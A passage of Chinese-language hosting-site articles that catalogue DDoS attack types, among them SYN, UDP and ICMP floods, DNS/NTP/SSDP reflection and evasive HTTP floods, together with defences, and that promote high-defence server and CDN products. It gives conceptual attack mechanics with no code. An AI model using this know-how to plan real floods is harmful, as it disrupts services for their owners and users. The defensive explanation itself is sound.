预见,这两个数值被刷新的时间亦不会太久。 #### DDoS攻击的种类与详细介绍 什么是DDOS流量攻击?我们大多数人第一眼看到这个DDOS就觉得是英文的,有点难度,毕竟是国外的,其实简单通俗来讲,DDOS攻击是利用带宽的流量来攻击服务器以及网站。 举个例子,服务器目前带宽是100M,突然从外边来了200M的带宽流量进来,那么服务器根本承载不了这个200M的带宽流量,服务器的网络瞬间就会瘫痪,导致服务器无法连接,甚至导致服务器里的网站都无法打开,因为200M的带宽流量,已经占满了整个服务器的100M带宽。 再举一个更贴切于生活的例子:一家饭店,正常情况下最多能承载100个人吃饭,因为同行竞争,对面饭店老板雇佣了200个社会小混混去饭店吃饭,导致饭店满客,无法再接纳正常的客人来饭店吃饭了。这就是DDOS攻击,利用流量去占满服务器的带宽,导致没有多余的带宽来提供用户的网站访问。 DDOS流量攻击分很多种,有UDP-flood流量攻击,TCP-flood流量攻击,ICMP-flood流量攻击TCP/UPD/ICMP分片式流量攻击,SYN-flood流量攻击,ACK-flood流量攻击,zeroWindow攻击,SSL-flood攻击,SSLkeyrenego攻击,DNS反射性放大流量攻击,NTS反射,NTP反射,SNMP反射,SSDP反射,Chargen反射。 UDP-flood是属于UDP协议中的一种流量攻击,攻击特征是伪造大量的真实IP并发送小数量的数据包对要攻击的服务器进行发送,只要服务器开启UDP的端口就会受到流量攻击。如何防御这种流量攻击,对UDP的包数据大小进行设置,严格把控发送的数据包大小,超过一定值的数据包进行丢弃,再一个防御的方法是只有建立了TCP链接的IP,才能发送UDP包,否则直接屏蔽该IP。 ICMP是利用ICMP协议对服务器进行PING的攻击,放大icmp的长度,以及数据包的字节对服务器进行攻击。TCP-flood攻击是一种使用tcp三次握手协议的一种方式来进行的攻击,攻击特种是伪造大量的真实IP去连接要攻击的服务器,导致服务器无法承载更多的TCP连接而导致服务器瘫痪。 SYN-Flood是利用SYN协议,客户端协议上发送SYN数据,服务器接收到并响应SYN以及ACK反映,攻击者利用这个方式去模拟大量的客户连接发送数据包,导致服务器瘫痪。 ACK-Flood的攻击跟上面这个SYN的攻击差不多,都是同样采用发送数据包到服务器端去,攻击者利用ACK数据包进行攻击,只要服务器接受ACK的包,那么就会造成ACK连接过多导致服务器资源耗尽,服务器没有多余的资源来接收ACK的包,服务器就无法打开了。 SSL-Flood是利用客户端不断的与SSL通道握手,SSL的资源比普通的用户访问HTTP网站消耗的资源还要多,会多出几十倍,配置低的服务器根本无法承载SSL的多次请求与握手,导致服务器的CPU占用到百分之90,没有多余的CPU去处理用户的访问。SSL流量攻击如何防御:禁用Renegotiating的安全机制来防御大量的SSL流量攻击。 反射放大性流量攻击 反射性的攻击,不管是DNS反射还是NTP反射,都是使用的UDP协议攻击,UDP协议里访问用户发送请求的数据包到服务器,服务器再反馈给用户端,那么用户端发送到服务器里的请求数据包里,用户的IP可以进行伪造,可以伪造成服务器的IP,服务器IP发送数据包到服务器IP里,这样就造成了反射攻击。 DNS反射攻击也是一样的道理,利用DNS服务器的解析进行攻击,伪造要攻击的服务器IP,进行DNS查询,并查询到DNS服务器里,DNS服务器返回数据包到要攻击的服务器IP中去,一来一去 形成了反射流量攻击。 #### DDOS攻击类型有哪些?主机吧已知的35 种 DDoS 攻击类型 DDoS 攻击是在线业务的主要关注点。 根据 Akamai 的 2021年年度安全报告 ,DDoS 攻击总数增加了 179.66%! 这个数字表明,在过去两年中,数量惊人的企业已成为犯罪分子、活动家和黑客出于邪恶原因的目标。 它不仅会拒绝为企业用户提供服务,还会导致昂贵的账单。 一些 DDoS 攻击甚至可能对企业造成经济损失! 从尝试使用基于 ping 命令的 ICMP 回显请求泛洪目标到多向量攻击,DDoS 攻击多年来变得越来越庞大和复杂。 在这篇文章中,我们将了解不同类型的 DDoS 攻击。 以下是不同 DDoS 攻击类型的列表。 应用程序级攻击 DDoS 攻击可以针对特定应用程序或编码错误的网站,以利用其弱点并因此导致整个服务器瘫痪。 WordPress和 Joomla 是可以针对耗尽服务器资源的两个应用程序示例 - RAM、CPU 等。数据库也可以针对旨在利用这些漏洞的 SQL 注入。 然后,由于资源耗尽,耗尽的服务器无法处理合法请求。 存在安全漏洞的网站和应用程序也容易受到想要窃取信息的黑客的攻击。 零日 (0day) DDoS 这是一个标准术语(如 John Doe),用于描述利用新漏洞的攻击。 这些零日 DDoS 漏洞没有补丁或有效的防御机制。 平洪水 作为 ICMP 洪水的演进版本,这种 DDoS 攻击也是特定于应用程序的。 当服务器从一个非常大的源 IP 集合中接收到大量欺骗性的 Ping 数据包时,它就会成为 Ping Flood 攻击的目标。 这种攻击的目标是用 ping 数据包淹没目标,直到它下线。 它旨在消耗网络中的所有可用带宽和资源,直到它完全耗尽并关闭。 这种类型的 DDoS 攻击也不容易检测,因为它很容易类似于合法流量。 IP空攻击 数据包包含 IPv4 标头,其中包含有关正在使用的传输协议的信息。 当攻击者将此字段的值设置为零时,这些数据包可以绕过旨在扫描 TCP、IP 和 ICMP 的安全措施。 当目标服务器尝试处理这些数据包时,它最终会耗尽其资源并重新启动。 CharGEN 洪水 这是一个非常古老的协议,可以用来执行放大的攻击。 CharGEN 放大攻击是通过向运行 CharGEN 的启用互联网的设备发送携带目标欺骗 IP 的小数据包来执行的。 这些对此类设备的欺骗性请求随后用于将 UDP 泛洪作为这些设备的响应发送到目标。 大多数支持 Internet 的打印机、复印机等都默认启用此协议,并可用于执行 CharGEN 攻击。 这可用于在端口 19 上使用 UDP 数据包泛滥目标。当目标尝试理解这些请求时,它将失败。 服务器最终将耗尽其资源并脱机或重新启动。 SNMP 洪水 与 CharGEN 攻击一样,SNMP 也可用于放大攻击。 SNMP 主要用于网络设备。 SNMP 放大攻击是通过向运行 SNMP 的启用 Internet 的设备发送携带目标欺骗 IP 的小数据包来执行的。 这些对此类设备的欺骗性请求随后用于将 UDP 泛洪作为这些设备的响应发送到目标。 但是,与 CHARGEN 和 DNS 攻击相比,SNMP 的放大效应可能更大。 当目标试图理解大量请求时,它最终会耗尽其资源并离线或重新启动。 NTP 洪水 NTP 协议是另一种可公开访问的网络协议。 NTP 放大攻击也可以通过向运行 NTP 的启用互联网的设备发送携带目标欺骗 IP 的小数据包来执行。 这些对此类设备的欺骗性请求随后用于将 UDP 泛洪作为这些设备的响应发送到目标。 当目标试图理解大量请求时,它最终会耗尽其资源并离线或重新启动。 SSDP 洪水 支持 SSDP 的网络设备也可以从 Internet 访问 UPnP,这是生成 SSDP 放大洪水的简单来源。 SSDP放大攻击也是通过向设备发送携带目标欺骗IP的小数据包来进行的。 这些对此类设备的欺骗性请求用于将 UDP 泛洪作为这些设备的响应发送到目标。 当目标试图理解大量请求时,它最终会耗尽其资源并离线或重新启动。 其他放大的 DDoS 攻击 所有放大攻击都使用上述针对 CHARGEN、NTP 等的相同策略。其他 UDP 协议已被确定为执行放大洪水攻击 US CERT 的可能工具有: SNMPv2网络BIOSQOTDBitTorrent什么时候地震网络协议Steam 协议 分段 HTTP 泛滥 在这个针对已知漏洞的复杂攻击示例中,具有有效 IP 的 BOT 用于与 Web 服务器建立有效的 HTTP 连接。 然后,机器人将 HTTP 数据包拆分成微小的片段,并在超时之前尽可能慢地发送到目标。 这种方法允许攻击者长时间保持连接活动,而不会警告任何防御机制。 攻击者可以使用一个 BOT 启动多个未检测到的、扩展的和消耗资源的会话。 像 Apache 这样的流行 Web 服务器没有有效的超时机制。 这是一个 DDoS 安全漏洞,一些 BOT 可以利用它来停止 Web 服务。 HTTP 洪水 BOT 的真实 IP 用于避免怀疑。 用于执行攻击的 BOT 数量与此攻击的源 IP 范围相同。 由于 BOT 的 IP 地址没有被欺骗,因此防御机制没有理由标记这些有效的 HTTP 请求。 一个 BOT 可用于发送大量 GET、POST 或其他 HTTP 请求来执行攻击。 可以在 HTTP DDoS 攻击中组合多个机器人,以完全削弱目标服务器。 单会话 HTTP 洪水 攻击者可以利用 HTTP 1.1 中的漏洞从单个 HTTP 会话发送多个请求。 这允许攻击者从少数会话中发送大量请求。 换句话说,攻击者可以绕过 DDoS 防御机制对允许的会话数量的限制。 Single Session HTTP Flood 还针对服务器的资源来触发系统完全关闭或性能不佳。 单一请求 HTTP 泛洪 当防御机制演变为阻止许多传入的数据包时,像 Single Packet HTTP Flood 这样的攻击被设计为避开这些防御的变通方法。 HTTP 洪水的这种演变利用了 HTTP 技术中的另一个漏洞。 通过在一个 HTTP 数据包中屏蔽这些请求,单个 HTTP 会话可以发出多个 HTTP 请求。 该技术通过将数据包速率保持在允许的范围内,允许攻击在耗尽服务器资源的同时保持隐形。 递归 HTTP GET 泛滥 为了使攻击高度成功,它必须尽可能长时间地保持未被发现。 不被发现的最佳方法是在执行另一次攻击时保持在所有限制范围内,从而显示为合法请求。 递归 GET 通过收集页面或图像列表并似乎正在浏览这些页面或图像来自行实现这一点。 这种攻击可以与 HTTP 洪水攻击结合使用,以获得最大的影响。 随机递归 GET 洪水 此攻击是递归 GET 攻击的一种专门构建的变体。 它专为按顺序排列页面的论坛、博客和其他网站而设计。 与递归 GET 一样,它似乎也在浏览页面。 由于页面名称是按顺序排列的,为了保持作为合法用户的外观,它每次使用来自有效页面范围的随机数来发送新的 GET 请求。 随机递归 GET 还旨在通过大量 GET 请求降低其目标的性能,并拒绝对真实用户的访问。 多向量攻击 我们讨论了攻击者将递归 GET 攻击与 HTTP 洪水攻击相结合以放大攻击的影响。 这只是攻击者同时使用两种类型的 DDoS 攻击来针对服务器的一个示例。 攻击还可以结合多种方法,让处理 DDoS 攻击的工程师感到困惑。 这些攻击是最难处理的,并且能够摧毁一些受到最佳保护的服务器和网络。 SYN 洪水 这种攻击利用了客户端、主机和服务器之间的三向 TCP 通信过程的设计。 在这个过程中,客户端通过生成一个 SYN 包来发起一个新的会话。 主机分配并检查这些会话,直到它们被客户端关闭。 为了进行 SYN Flood 攻击,攻击者从欺骗的 IP 地址向目标服务器发送大量 SYN 数据包。 这种攻击一直持续到耗尽服务器的连接表内存——存储和处理这些传入的 SYN 数据包。 结果是服务器由于资源耗尽而无法处理合法请求,直到攻击持续。 SYN-ACK 泛洪 这种 DDoS 攻击利用了三向 TCP 通信过程的第二步。 在此步骤中,侦听主机生成一个 SYN-ACK 数据包以确认传入的 SYN 数据包。 在 SYN-ACK Flood 攻击中,大量伪造的 SYN-ACK 数据包被发送到目标服务器。 当服务器试图处理大量请求时,攻击试图耗尽服务器的资源——它的 RAM、CPU 等。 结果是服务器由于资源耗尽而无法处理合法请求,直到攻击持续。 ACK 和 PUSH ACK 泛洪 在活动的 TCP-SYN 会话期间,ACK 或 PUSH ACK 数据包将信息传送到主机和客户端机器,直到会话结束。 在 ACK & PUSH ACK 洪水攻击期间,大量的欺骗性 ACK 数据包被发送到目标服务器以使其泄气。 由于这些数据包没有与服务器连接列表上的任何会话链接,因此服务器会花费更多资源来处理这些请求。 结果是服务器由于资源耗尽而无法处理合法请求,直到攻击持续。 ACK 分片泛滥 在 ACK & PUSH ACK Flood 攻击的这种带宽消耗版本中使用了分段的 ACK 数据包。 为了执行这种攻击,1500 字节的分段数据包被发送到目标服务器。 这些数据包更容易在未被检测到的情况下到达其目标,因为它们通常不会被路由器在 IP 级别重新组合。 这使得攻击者可以通过路由设备发送少量包含不相关数据的数据包,从而消耗大量带宽。 此攻击通过尝试消耗网络中的所有可用带宽来影响目标网络中的所有服务器。 RST/FIN 洪水 在成功的三向或四向 TCP-SYN 会话后,服务器会交换 RST 或 FIN 数据包以关闭主机和客户端计算机之间的 TCP-SYN 会话。 在 RST 或 FIN Flood 攻击中,目标服务器会收到大量不属于目标服务器上任何会话的欺骗性 RST 或 FIN 数据包。 当服务器试图处理这些无效请求时,攻击试图耗尽服务器的资源——它的 RAM、CPU 等。 结果是服务器由于资源耗尽而无法处理合法请求。 同义IP攻击 为了使服务器宕机,大量携带目标服务器的源 IP 和目标 IP 的 TCP-SYN 数据包被发送到目标服务器。 即使数据包携带目标服务器的源和目标 IP 信息,这些数据也不重要。 Synonymous IP 攻击的目标是耗尽服务器的资源——RAM、CPU 等,因为它试图计算这种异常。 然后,由于资源耗尽,耗尽的服务器无法处理合法请求。 欺骗性会话泛滥 上述一些 DDoS 攻击无法欺骗大多数现代防御机制,但 DDoS 攻击也在不断发展以绕过这些防御。 Fake Session 攻击试图通过携带一个 SYN、多个 ACK​​ 和一个或多个 RST 或 FIN 数据包来伪装有效的 TCP 会话来绕过安全性。 这种攻击可以绕过仅监视网络上传入流量的防御机制。 这些 DDoS 攻击还可能耗尽目标的资源并导致系统完全关闭或系统性能不可接受。 多个 SYN-ACK 欺骗性会话泛滥 此版本的虚假会话攻击包含多个 SYN 和多个 ACK​​ 数据包以及一个或多个 RST 或 FIN 数据包。 多 SYN-ACK 假会话是演进 DDoS 攻击的另一个例子。 它们被更改为绕过依赖非常具体的规则来防止此类攻击的防御机制。 与 Fake Session 攻击一样,这种攻击也可以耗尽目标的资源并导致系统完全关闭或系统性能不可接受。 多个 ACK​​ 欺骗会话泛滥 在这个版本的 Fake Session 中完全跳过了 SYN。 多个 ACK​​ 数据包用于开始和携带攻击。 这些 ACK 包后面跟着一个或多个 RST 或 FIN 包,以完成 TCP 会话的伪装。 与最初的 SYN-Flood 攻击相比,这些攻击往往更成功地保持在雷达之下,因为它们产生的 TCP-SYN 流量较低。 与其来源一样,Multiple ACK Fake Session 攻击也可以耗尽目标的资源并导致系统完全关闭或系统性能不可接受。 会话攻击 为了绕过防御,这种攻击不使用欺骗性 IP,而是使用用于执行攻击的 BOT 的真实 IP 地址。 用于执行攻击的 BOT 数量与此攻击的源 IP 范围相同。 这种攻击是通过在 BOT 和目标服务器之间创建 TCP-SYN 会话来执行的。 然后通过延迟 ACK 数据包延长该会话直到超时。 会话攻击试图通过这些空会话耗尽服务器的资源。 这反过来又会导致系统完全关闭或系统性能无法接受。 滥用应用程序攻击 攻击者首先入侵托管 P2P 服务等高流量应用程序的客户端计算机。 来自这些客户端机器的流量然后被重定向到目标服务器。 目标服务器在尝试接受和协商过多的流量时会耗尽其资源。 在这种情况下,防御机制不会被触发,因为被黑客入侵的客户端机器实际上是在尝试与目标服务器建立有效连接。 在成功将流量重定向到目标后,随着攻击的进行,攻击者会断开网络并变得无法追踪。 滥用应用程序攻击以服务器的资源为目标,并试图将其关闭或破坏其性能。 UDP洪水 顾名思义,在这种类型的 DDoS 攻击中,服务器被 UDP 数据包淹没。 与 TCP 不同,客户端和主机之间没有端到端的通信过程。 这使得防御机制更难识别 UDP Flood 攻击。 大量伪造的 UDP 数据包从大量源 IP 发送到目标服务器以将其关闭。 UDP洪水攻击可以通过在攻击数据包中包含目标服务器的端口和IP地址来针对随机服务器或网络中的特定服务器。 这种攻击的目标是消耗网络中的带宽,直到所有可用带宽都用完为止。 UDP 分片泛滥 这是另一种不易检测到的巧妙掩盖的 DDoS 攻击。 此攻击产生的活动类似于有效流量,并且所有流量都保持在限制范围内。 此版本的 UDP Flood 攻击发送更大但碎片化的数据包,通过发送更少的碎片化 UDP 数据包来耗尽更多带宽。 当目标服务器试图将这些不相关的、伪造的分段 UDP 数据包放在一起时,它会失败。 最终,所有可用资源都用尽,服务器可能会重新启动。 DNS 泛滥 最著名的 DDoS 攻击之一,此版本的 UDP 洪水攻击是特定于应用程序的——在这种情况下是 DNS 服务器。 它也是最难检测和预防的 DDoS 攻击之一。 为了执行,攻击者会发送大量伪造的 DNS 请求数据包,这些数据包看起来与来自大量源 IP 的真实请求没有什么不同。 这使得目标服务器无法区分合法的 DNS 请求和看似合法的 DNS 请求。 在尝试服务所有请求时,服务器会耗尽其资源。 攻击会消耗网络中的所有可用带宽,直到完全耗尽。 网络电话泛滥 此版本的特定于应用程序的 UDP 泛洪针对 VoIP 服务器。 攻击者从一个非常大的源 IP 集发送大量欺骗性的 VoIP 请求数据包。 当 VoIP 服务器充斥着欺骗性请求时,它会在尝试为有效和无效请求提供服务时耗尽所有可用资源。 这会重新启动服务器或对服务器的性能造成影响并耗尽可用带宽。 VoIP 泛洪可以包含固定或随机源 IP。 固定源 IP 地址攻击不易检测,因为它会自我掩饰,看起来与合法流量没有什么不同。 媒体数据泛滥 与 VoIP 洪水一样,服务器也可能受到音频和视频等媒体数据的攻击。 攻击者从一个非常大的源 IP 集合中发送大量的欺骗性媒体数据包。 当服务器充斥着欺骗性媒体数据请求时,它会耗尽所有可用资源和网络带宽来处理这些请求。 除了使用欺骗性媒体数据包攻击服务器之外,这种攻击在其他方面都类似于 VoIP 泛洪。 当它们使用固定源 IP 时,也很难检测到这些攻击,因为这给了它们一个合法的外观。 该攻击旨在消耗网络中所有可用的服务器资源和带宽,直到完全耗尽。 直接 UDP 泛洪 目标服务器受到大量 Non-Spoofed UDP 数据包的攻击。 为了掩盖攻击,攻击者不会欺骗 BOT 的实际 IP 地址。 用于执行攻击的 BOT 数量与此攻击的源 IP 范围相同。 该攻击旨在消耗网络中的所有可用带宽和资源,直到它完全耗尽并关闭。 这种类型的 DDoS 攻击也不容易检测,因为它类似于合法流量。 ICMP 洪水 与 UDP 一样,ICMP 堆栈也没有用于数据交换的端到端过程。 这使得检测 ICMP 洪水攻击变得更加困难。 攻击者从一个非常大的源 IP 集发送大量的欺骗性 ICMP 数据包。 当服务器充斥着大量的欺骗性 ICMP 数据包时,它的资源在尝试处理这些请求时就会耗尽。 这种过载会重新启动服务器或对其性能产生巨大影响。 ICMP 洪水攻击可以通过在数据包中包含目标服务器的端口和 IP 地址来针对随机服务器或网络中的特定服务器。 这种攻击的目标是消耗网络中的带宽,直到它耗尽可用带宽。 ICMP 碎片泛滥 此版本的 ICMP 洪水攻击通过发送更少的碎片 ICMP 数据包来发送更大的数据包以耗尽更多带宽。 当目标服务器试图将这些伪造的、没有关联的碎片化 ICMP 数据包放在一起时,它会失败。 服务器最终耗尽其资源并重新启动。 #### DDoS攻击类型有哪些?这些攻击有哪些防御方法? DDoS攻击(分布式拒绝服务攻击)是一种通过大量流量淹没目标服务器或网络,使其无法正常提供服务的网络攻击。根据攻击的目标和方法,DDoS攻击可以分为以下几种主要类型: 1. 流量型攻击(Volumetric Attacks) UDP Flood:攻击者发送大量的UDP数据包到目标服务器,耗尽其带宽资源。 ICMP Flood:也称为Ping Flood,攻击者发送大量的ICMP请求(如Ping请求)到目标,使其无法处理正常的网络请求。 IP Fragmentation Attack:攻击者发送大量分片的IP数据包,导致目标系统在重组这些数据包时消耗大量资源。 DNS Amplification Attack:攻击者利用DNS服务器的放大效应,发送大量伪造的DNS请求,使得DNS服务器向目标发送大量的响应数据。 2. 协议攻击(Protocol Attacks) SYN Flood:攻击者发送大量的SYN请求到目标服务器,但不完成TCP三次握手,导致服务器的TCP连接表被占满,无法接受新的连接请求。 ACK Flood:攻击者发送大量的ACK数据包,试图干扰目标服务器的TCP连接。 Ping of Death:攻击者发送超大尺寸的Ping数据包,导致目标系统在处理时出现缓冲区溢出。 Smurf Attack:攻击者发送大量ICMP请求到一个广播地址,并将源地址伪造为目标服务器的IP地址,导致网络上的所有主机都向目标服务器发送响应,从而淹没目标。 3. 应用层攻击(Application Layer Attacks) HTTP Flood:攻击者发送大量的HTTP请求到目标服务器,这些请求看似合法,但数量巨大,足以耗尽服务器的资源。 HTTPS Flood:类似于HTTP Flood,但攻击的是加密的HTTPS连接,处理加密请求需要更多的资源。 Slowloris:攻击者发送少量但持续的HTTP请求,使服务器的连接保持打开状态,从而占用服务器的连接资源。 Zero-day Attacks:利用尚未公开或修复的安全漏洞进行攻击。 多向量攻击(Multi-vector Attacks) 多向量攻击结合了以上多种攻击类型,攻击者同时从多个方向对目标发起攻击,使得防御更加困难。 DDoS攻击的种类繁多,且随着技术的发展不断演变,因此防御DDoS攻击需要综合多种策略和技术手段。 防御DDoS攻击的方法多种多样,以下是一些常见的防御策略: 流量型攻击防御方法 带宽扩容:增加网络带宽容量,使攻击流量在一定程度上被吸收。 流量清洗:通过流量清洗设备或服务,识别并过滤掉异常流量,只将正常流量传递给目标服务器。 黑洞路由:当攻击流量过大时,将攻击流量导向一个“黑洞”地址,使其无法到达目标服务器。 协议攻击防御方法 TCP连接限制:设置TCP连接的速率限制和并发连接数限制,防止SYN Flood等攻击。 协议栈加固:优化服务器的操作系统协议栈参数,提高其对协议攻击的抵抗能力。 防火墙规则:配置防火墙规则,阻止可疑的协议请求,如限制ICMP请求的速率。 应用层攻击防御方法 Web应用防火墙(WAF):部署WAF来检测和过滤恶意的HTTP请求,保护Web应用的安全。 缓存机制:使用缓存技术,将静态内容缓存在CDN或本地缓存中,减少服务器的计算和响应压力。 请求速率限制:对客户端的请求速率进行限制,防止大量请求同时到达服务器。 身份验证和授权:对用户进行身份验证和授权,确保只有合法用户才能访问应用。 多向量攻击防御方法 多层防御体系:构建多层防御体系,包括网络层、传输层和应用层的防御措施,以应对不同类型的攻击。 分布式防御架构:采用分布式防御架构,将流量分散到多个节点进行处理,提高整体的防御能力。 其他防御策略 监控和预警:实时监控网络流量和服务器状态,及时发现异常流量和攻击行为,并发出预警。 应急响应计划:制定详细的应急响应计划,当遭受DDoS攻击时,能够迅速采取措施进行应对。 与ISP合作:与互联网服务提供商(ISP)合作,利用其网络资源和专业能力进行流量清洗和攻击防御。 防御DDoS攻击需要综合运用多种策略和技术手段,根据实际情况灵活调整和优化防御措施,以提高整体的防御效果。 专业的DDoS防御服务 想要彻底防御DDoS攻击,我们往往需要用到专业的DDoS防御服务,比如高防服务器、高防IP、高防CDN,这些都是专业的DDoS防御服务,可应对多种类型的DDoS攻击。 高防服务器 定义:高防服务器是一种具有高防御能力的服务器,能够抵御大流量的DDoS攻击。 特点: 高带宽:通常配备高带宽的网络连接,能够承受较大的流量冲击。 硬件防火墙:配备专业的硬件防火墙,可以有效过滤和清洗异常流量。 流量牵引技术:通过流量牵引技术,将攻击流量引导到特定的防御节点进行处理。 应用场景:适用于需要高安全性和稳定性的业务,如游戏服务器、金融网站等。 高防服务器推荐:https://www.suduwangluo.com/ecc 高防IP 定义:高防IP是一种通过IP地址进行流量清洗和防御的服务。 特点: 流量清洗:通过专业的清洗中心,对流量进行实时监测和清洗,过滤掉恶意流量。 隐藏源站:可以隐藏真实的服务器IP地址,防止攻击者直接针对源站进行攻击。 弹性扩展:根据攻击流量的大小,自动扩展防御资源。 应用场景:适用于需要保护源站安全的业务,如电商平台、在线教育平台等。 高防IP推荐:https://www.suduwangluo.com/ip 高防CDN 定义:高防CDN是一种结合CDN加速和DDoS防御的服务。 特点: 全球节点分布:通过全球分布的CDN节点,分散流量,减轻单一服务器的压力。 智能调度:根据用户的地理位置和网络状况,智能调度流量到最优节点。 多重防护:提供流量清洗、CC防护、Web应用防火墙等多种防护措施。 应用场景:适用于需要同时提升访问速度和安全性的业务,如大型门户网站、视频网站等。 高防CDN推荐: 百度云防护:https://www.zhujib.com/shop/26864.html 京东云星盾:https://www.zhujib.com/shop/20576.html 这些专业的DDoS防御服务通过强大的基础设施和先进的技术手段,能够有效应对多种类型的DDoS攻击,保障业务的稳定运行和数据的安全。 #### DDoS攻击除了破坏网络还有其他攻击的? 我们都知道DDoS攻击除了会让你的服务器网络停歇外,对于一些无关紧要的业务来说,其实伤害并不大。 很多被攻击方并不当回事,但很多攻击都是组合攻击的,他们只是利用DDOS在明,入侵在暗,如果不加以防范,将会损失惨重,下面我们来介绍一些DDOS组合攻击特点。 一、DDoS 攻击目的更加隐蔽且复杂 众所周知,分布式拒绝服务 (DDoS) 对企业来说是毁灭性的。但传统的 DDoS 攻击仅仅是发送大量无效请求以使您的香港服务器超载致其无法正常访问,而现在的 DDoS 攻击不再是独立的暴力攻击,而更多地为其他更隐蔽更严重的网络犯罪做铺垫。具体而言,DDoS 通常为网络破坏和可能的恶意软件注入提供掩护。 二、DDoS + 网络违规 相关调查显示,每 3 个 DDoS 事件中就有 1 个与网络入侵相结合。入侵可能导致:22% 的企业在发生 DDoS 时数据被盗,31% 的中小型企业丢失信息。 网站一但被入侵,会大量生产大量赌博、色情等违法违规内容,给网站、企业造成严重损失。 三、DDoS + 恶意软件 相关调查发现,在攻击者上传恶意软件时,常常用 DDoS 攻击来往往引起和转移注意力。其中,五分之三的分布式拒绝服务 (DDoS) 攻击是旨在压垮咱先业务的大量流量超载事件。其中许多攻击的范围是每秒 50-100 Gb。然而,剩下的 40% 并不像 5 Gbps 那样大规模。其中,36% 的企业在从 DDoS 恢复期间或之后发现了恶意软件。当 DDoS 攻击相对温和时,企业更多地经历恶意软件注入。例如,在特别敏感的金融行业中,43% 的组织或企业在 DDoS 期间遭受恶意软件攻击,而 54% 的组织和企业在 4 Gbps 或更低的轻度 DDoS 期间受到恶意软件攻击。并且,每 3 个恶意软件事件中就有 2 个数据被盗。这些结果表明,越来越多的 DDoS 攻击实际是阵地特定目的的针对性的掩护行为。 所以,我们要对网站安全进行重视,平时要给网站做些安全防御,比如增加安全CDN。 这里主机吧推荐产品: 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。相关链接 京东云星盾安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。相关链接 #### DDoS的攻击方式与防御方法 DDoS的攻击方式 1、Synflood 该攻击以多个随机的源主机地址向目的主机发送SYN包,而在收到目的主机的SYN ACK后并不回应。 这样,目的主机就为这些源主机建立了大量的连接队列,而且由于没有收到ACK一直维护着这些队列,造成了资源的大量消耗,最终导致拒绝服务。 2、Smurf 该攻击向一个子网的广播地址发一个带有特定请求(如ICMP回应请求)的包,并且将源地址伪装成想要攻击的主机地址。 子网上所有主机都回应广播包请求而向被攻击主机发包,使该主机受到攻击。 3、Land-based 攻击者将一个包的源地址和目的地址都设置为目标主机的地址,然后将该包通过IP欺骗的方式发送给被攻击主机,这种包可以造成被攻击主机因试图与自己建立连接而陷入死循环,从而很大程度地降低了系统性能。 4、Ping of Death 根据TCP/IP的规范,一个包的长度最大为65536字节。尽管一个包的长度不能超过65536字节,但是一个包分成的多个片段的叠加却能做到。 当一个主机收到了长度大于65536字节的包时,就是收到了Ping of Death攻击,该攻击会造成主机的宕机。 5、Teardrop IP数据包在网络传递时,数据包可以分成更小的片段。攻击者可以通过发送两段(或者更多)数据包来实现TearDrop攻击。第一个包的偏移量为0,长度为N,第二个包的偏移量小于N。 为了合并这些数据段,TCP/IP堆栈会分配超乎寻常的巨大资源,从而造成系统资源的缺乏甚至机器的重新启动。 6、PingSweep 使用ICMP Echo轮询多个主机。 7、Pingflood 该攻击在短时间内向目的主机发送大量ping包,造成网络堵塞或主机资源耗尽。 DDOS攻击防御方法 1、按攻击流量规模分类 (1) 较小流量:小于1000Mbps,且在服务器硬件与应用接受范围之内,并不影响业务的: 利用iptables或者DDoS防护应用实现软件层防护。 (2) 大型流量:大于1000Mbps,但在DDoS清洗设备性能范围之内,且小于机房出口,可能影响相同机房的其他业务的:利用iptables或者DDoS防护应用实现软件层防护,或者在机房出口设备直接配置黑洞等防护策略,或者同时切换域名,将对外服务IP修改为高负载Proxy集群外网IP,或者CDN高仿IP,或者公有云DDoS网关IP,由其代理到RealServer;或者直接接入DDoS清洗设备。 (3) 超大规模流量:在DDoS清洗设备性能范围之外,但在机房出口性能之内,可能影响相同机房的其他业务,或者大于机房出口。 已经影响相同机房的所有业务或大部分业务的:联系运营商检查分组限流配置部署情况并观察业务恢复情况。 2、按攻击流量协议分类 (1) syn/fin/ack等tcp协议包:设置预警阀值和响应阀值,前者开始报警,后者开始处理,根据流量大小和影响程度调整防护策略和防护手段,逐步升级。 (2) UDP/DNS query等UDP协议包:对于大部分游戏业务来说,都是TCP协议的,所以可以根据业务协议制定一份TCP协议白名单,如果遇到大量UDP请求,可以不经产品确认或者延迟跟产品确认,直接在系统层面/HPPS或者清洗设备上丢弃UDP包。 (3) http flood/CC等需要跟数据库交互的攻击:这种一般会导致数据库或者webserver负载很高或者连接数过高,在限流或者清洗流量后可能需要重启服务才能释放连接数,因此更倾向在系统资源能够支撑的情况下调大支持的连接数。 相对来说,这种攻击防护难度较大,对防护设备性能消耗很大。 (4) 其他:icmp包可以直接丢弃,先在机房出口以下各个层面做丢弃或者限流策略。现在这种攻击已经很少见,对业务破坏力有限。 #### DDoS防御中的清洁流量是指什么? 很多网站管理员在购买防御产品的时候经常会遇到产品中显示清洁流量每月限制多少G多少T,一看还以为是防御攻击的总流量,而且还这么少,哪里够黑客攻击几下就没了。 其实这是一个错误的解读,清洁流量是指经过流量清洗过后的正常业务流量(非攻击流量),所以我们不需要担心清洁流量被攻击没了,但如果你的正常访问流量非常消耗流量的话,那你就需要担心流量够不够用了。 #### DDoS防御的几类方法:本地DDoS防护、基于云的DDOS防护、混合型DDoS防护 DDoS防护的方法主机帮大概分为三大类:本地DDoS防护、基于云的DDOS防护、混合型DDoS防护。 今天主机帮就来说下这三大类的特点: 本地DDoS防护: 在本地服服务器部署DDOS防护硬件设备,部署防火墙软件。 优势:提供紧密的控制力和出色的灵活性,可以根据业务的具体需求定制解决方案。 劣势:对服务器配置要求高,需要接入非常大的带宽,容易被大规模的容量耗尽攻击击溃,而且维护成本较高。 适用对象:适用于本地网络搭建或托管服务器到机房的用户,不适用于云服务器,因为云服务器商部署不了自己的硬件设备。 基于云的高防服务: 我们熟知的高防IP、高防CDN服务,都是一种云防护模式。 优势:能够处理大规模的DDoS攻击流量,因为云平台通常拥有巨大的带宽资源;易于扩展且无需维护硬件。 